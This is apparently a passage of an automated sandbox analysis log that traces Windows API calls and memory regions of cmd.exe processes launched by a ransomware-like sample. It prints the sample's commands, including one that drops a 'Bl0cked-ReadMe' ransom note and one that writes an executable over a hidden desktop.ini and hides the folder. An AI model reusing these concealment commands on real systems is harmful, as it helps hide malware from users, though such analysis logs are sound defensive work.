samDesired=0x2000000, phkResult=0x30eae4 | out: phkResult=0x30eae4*=0x40) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x0, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegCloseKey (hKey=0x40) returned 0x0 [0149.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0149.492] srand (_Seed=0x5b886378) [0149.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" [0149.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" 
[0149.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.493] GetEnvironmentStringsW () returned 0x432318* [0149.493] FreeEnvironmentStringsW (penv=0x432318) returned 1 [0149.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 
[0149.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.493] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.493] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.493] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f8b0, lpFilePart=0x30f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f8ac*="Desktop") returned 0x18 [0149.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.494] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.494] GetEnvironmentStringsW () returned 0x432b38* [0149.495] FreeEnvironmentStringsW (penv=0x432b38) returned 1 [0149.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.495] GetConsoleOutputCP () returned 0x1b5 [0149.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.495] GetUserDefaultLCID () returned 0x409 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="0") returned 2 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="0") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="1") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.496] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.496] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.497] GetConsoleTitleW (in: lpConsoleTitle=0x420908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.498] _wcsicmp (_String1="type", _String2=")") returned 75 [0149.498] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0149.498] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0149.498] _wcsicmp (_String1="IF", _String2="type") returned -11 [0149.498] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0149.498] _wcsicmp (_String1="REM", _String2="type") returned -2 [0149.498] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] GetFileType (hFile=0x7) returned 0x2 [0149.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0149.503] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f8e8 | out: lpMode=0x30f8e8) returned 1 [0149.503] _dup (_FileHandle=1) returned 3 [0149.503] _close (_FileHandle=1) returned 0 [0149.503] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0149.503] CreateFileW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f8b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.530] GetLastError () returned 0x20 [0149.530] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0149.531] _close (_FileHandle=3) returned 0 [0149.531] _get_osfhandle (_FileHandle=2) returned 0xb [0149.531] GetFileType (hFile=0xb) returned 0x2 [0149.531] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0149.531] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f864 | out: lpMode=0x30f864) returned 1 [0149.531] _get_osfhandle (_FileHandle=2) returned 0xb [0149.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f898 | out: lpConsoleScreenBufferInfo=0x30f898) returned 1 [0149.532] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0149.533] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30f8d8 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0149.533] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x30f8bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30f8bc*=0x51) returned 1 [0149.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.534] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.534] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0149.534] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.534] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.534] SetConsoleInputExeNameW () returned 0x1 [0149.534] GetConsoleOutputCP () returned 0x1b5 [0149.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.534] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.534] exit (_Code=1) Process: id = "231" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19285 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19286 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 19287 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19288 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19289 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19290 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19291 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19292 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19293 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 19294 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19295 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19296 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19297 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 19298 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19299 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 19300 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19301 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19303 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19304 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19305 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19306 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19307 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19308 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19309 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 19310 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19311 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19312 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19313 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19314 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19315 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19316 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 19317 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 19318 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" 
Region: id = 19324 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 293 os_tid = 0xc58 [0149.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af914 | out: lpSystemTimeAsFileTime=0x2af914*(dwLowDateTime=0x931af880, dwHighDateTime=0x1d440a9)) [0149.601] GetCurrentProcessId () returned 0x698 [0149.601] GetCurrentThreadId () returned 0xc58 [0149.601] GetTickCount () returned 0x2e54f [0149.601] QueryPerformanceCounter (in: lpPerformanceCount=0x2af90c | out: lpPerformanceCount=0x2af90c*=20639173314) returned 1 [0149.603] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.603] __set_app_type (_Type=0x1) [0149.603] __p__fmode () returned 0x76b331f4 [0149.603] __p__commode () returned 0x76b331fc [0149.604] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.604] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.604] GetCurrentThreadId () returned 0xc58 [0149.604] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc58) returned 0x38 [0149.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.604] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.604] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.604] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af8a4 | out: phkResult=0x2af8a4*=0x0) returned 0x2 [0149.604] VirtualQuery (in: lpAddress=0x2af8db, 
lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.604] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0149.605] GetConsoleOutputCP () returned 0x1b5 [0149.605] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.605] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.606] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: 
lpMode=0x4a9e41b0) returned 1 [0149.606] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.606] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.606] GetEnvironmentStringsW () returned 0x330598* [0149.606] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.606] GetEnvironmentStringsW () returned 0x330598* [0149.606] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae814 | out: phkResult=0x2ae814*=0x40) returned 0x0 [0149.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x48, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.606] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x0, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x40, 
